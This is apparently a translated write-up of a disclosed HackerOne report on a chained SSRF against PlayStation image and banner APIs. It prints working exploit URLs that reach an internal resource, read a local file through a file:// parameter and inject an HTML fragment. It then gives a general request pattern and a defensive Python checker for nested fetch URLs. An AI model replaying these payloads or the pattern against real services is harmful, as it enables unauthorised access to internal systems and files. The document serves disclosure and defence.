SSRF attack chain
This article is a bit of a brain-teaser, but the author has worked out the whole chain of logic below; let's take a look.
Premise:
The following two endpoints were found to have SSRF issues:
https://image.api.np.km.playstation.net/dis/images
https://image.api.np.km.playstation.net/images
These two endpoints are very important and will be used later.
A request was found whose response was 403; the request URL is as follows:
https://store.mgmt.playstation.com/store/api/chihiro/00_09_000/container/US/en/999/UP4134-CUSA00329_00-ONNTGAME00000001/1429722215000/image?_version=00_09_000&platform=chihiro&w=225&h=225&bg_color=000000&opacity=100
Since the response is 403, this may be an internal resource. What now? Continue:
https://image.api.np.km.playstation.net/images/?format=png&image=https%3a//store.mgmt.playstation.com/store/api/chihiro/00_09_000/container/US/en/999/UP4134-CUSA00329_00-ONNTGAME00000001/1429722215000/image%3f_version%3d00_09_000%26platform%3dchihiro%26w%3d225%26h%3d225%26bg_color%3d000000%26opacity%3d100
That is:
https://image.api.np.km.playstation.net/images/?format=png&image=https://store.mgmt.playstation.com/store/api/chihiro/00_09_000/container/US/en/999/UP4134-CUSA00329_00-ONNTGAME00000001/1429722215000/image?_version=00_09_000&platform=chihiro&w=225&h=225&bg_color=000000&opacity=100
The attacker then tries to request this restricted resource through another externally accessible API endpoint (such as https://image.api.np.km.playstation.net/images/). This endpoint is designed to fetch an image from a supplied URL, convert its format, and return it to the requester.
Bypassing access control via the SSRF endpoint: if image.api.np.km.playstation.net is allowed to reach store.mgmt.playstation.com, or has no proper security restrictions that block such requests, this SSRF request may succeed in fetching and returning the originally restricted image.
The logic here is:
https://image.api.np.km.playstation.net/images/?format=png&image=<internal resource URL>
or
https://image.api.np.km.playstation.net/dis/images/?format=png&image=<internal resource URL>
Continuing:
Another internal host was also found (its response was a timeout); it renders a remote image for the text we supply (PhantomJS), and on further analysis this service was found to support the file protocol as well:
https://dis.api.np.playstation.net/dis/v1/banners?backplate=https://homer.dl.playstation.net/pr/bam-art/272/352/44592b67-85ac-41d6-b310-334363c5ea58.jpg&dimensions=790x250&price=$36.99&price_discount=$24.41&format[]=PS4&type=Full Game&locale=en_CA&cta=Download Now!&output=png&tpl=banner-web-store&store=game&region=us&
Using the logic summarized above to exploit the vulnerability:
https://image.api.np.km.playstation.net/dis/images/?format=png&image=https%3A%2F%2Fdis.api.np.playstation.net%2Fdis%2Fv1%2Fbanners%3Fbackplate%3Dfile:////usr/share/pixmaps/system-logo-white.png%26dimensions%3D790x250%26price%3D%2436.99%26price_discount%3D%2424.41%26format%5B%5D%3DPS4%26type%3DF%22%3e%3c%73%3eull+Game%26locale%3Den_CA%26cta%3DDownload+No%26output%3Dsvg%26tpl%3Dbanner-web-store%26store%3Dgame%26region%3Dus%26
That is:
https://image.api.np.km.playstation.net/dis/images/?format=png&image=https://dis.api.np.playstation.net/dis/v1/banners?backplate=file:////usr/share/pixmaps/system-logo-white.png&dimensions=790x250&price=$36.99&price_discount=$24.41&format[]=PS4&type=F"><s>ull Game&locale=en_CA&cta=Download No&output=svg&tpl=banner-web-store&store=game&region=us&
From this we can summarize a general pattern:
#GET request
https://<host with SSRF>/<image-fetching endpoint>/parameter=<internal resource>
Endpoints and parameters can be obtained from documentation, packet capture and traffic analysis, error messages, API responses, and similar sources.
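The pattern above also tells a defender what to check: every hop of the chain is a URL carried inside a query parameter of the previous hop, decoded once per hop. The following is an added example, not code from the report or from the service's authors, that unwraps the image= and backplate= parameters level by level and flags any target whose host is outside an assumed allowlist or whose scheme is not http(s). It is run against the two request URLs quoted above (the second with its query trimmed) and a constructed benign request; the allowlist is an assumption.

```python
from urllib.parse import urlsplit, parse_qs

# Assumed allowlist of hosts the image proxy is meant to fetch from; the CDN host
# is the one used in the legitimate banner request above.
ALLOWED_HOSTS = {"homer.dl.playstation.net"}
# Query parameters that carry a URL to fetch: "image" at the proxy endpoints,
# "backplate" at the chained banner service.
TARGET_PARAMS = ("image", "backplate")

def fetch_targets(url, depth=0, max_depth=5):
    """Yield (depth, target_url) for every fetch target, following URL-in-URL nesting.

    Each level is decoded once by parse_qs, which mirrors how each hop in the chain
    decodes the query it receives before forwarding the inner URL onward.
    """
    if depth > max_depth:
        return
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for name in TARGET_PARAMS:
        for target in query.get(name, []):
            yield depth, target
            yield from fetch_targets(target, depth + 1, max_depth)

def assess(url):
    """Return a list of findings; an empty list means every hop stays on allowed hosts."""
    findings = []
    for depth, target in fetch_targets(url):
        parts = urlsplit(target)
        scheme = parts.scheme.lower()
        if scheme not in ("http", "https"):
            findings.append(f"depth {depth}: non-http scheme '{scheme}'")
        elif parts.hostname not in ALLOWED_HOSTS:
            findings.append(f"depth {depth}: host '{parts.hostname}' not allowlisted")
    return findings

# The two requests from the write-up (second one with its query trimmed) and a constructed benign one.
STORE_CHAIN = ("https://image.api.np.km.playstation.net/images/?format=png&image="
               "https%3a//store.mgmt.playstation.com/store/api/chihiro/00_09_000/container/US/en/999/"
               "UP4134-CUSA00329_00-ONNTGAME00000001/1429722215000/image%3f_version%3d00_09_000"
               "%26platform%3dchihiro%26w%3d225%26h%3d225%26bg_color%3d000000%26opacity%3d100")
FILE_CHAIN = ("https://image.api.np.km.playstation.net/dis/images/?format=png&image="
              "https%3A%2F%2Fdis.api.np.playstation.net%2Fdis%2Fv1%2Fbanners%3Fbackplate%3D"
              "file:////usr/share/pixmaps/system-logo-white.png%26dimensions%3D790x250"
              "%26output%3Dsvg%26tpl%3Dbanner-web-store%26store%3Dgame%26region%3Dus%26")
BENIGN = ("https://image.api.np.km.playstation.net/images/?format=png&image="
          "https%3A%2F%2Fhomer.dl.playstation.net%2Fpr%2Fbam-art%2Fexample.jpg")  # constructed

if __name__ == "__main__":
    for label, url in (("store", STORE_CHAIN), ("file", FILE_CHAIN), ("benign", BENIGN)):
        print(label, assess(url) or "ok")
```

The same walk can be applied to proxy access-log entries to find past abuse, since the nested target is fully recoverable from the request line.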
https://hackerone.com/reports/826097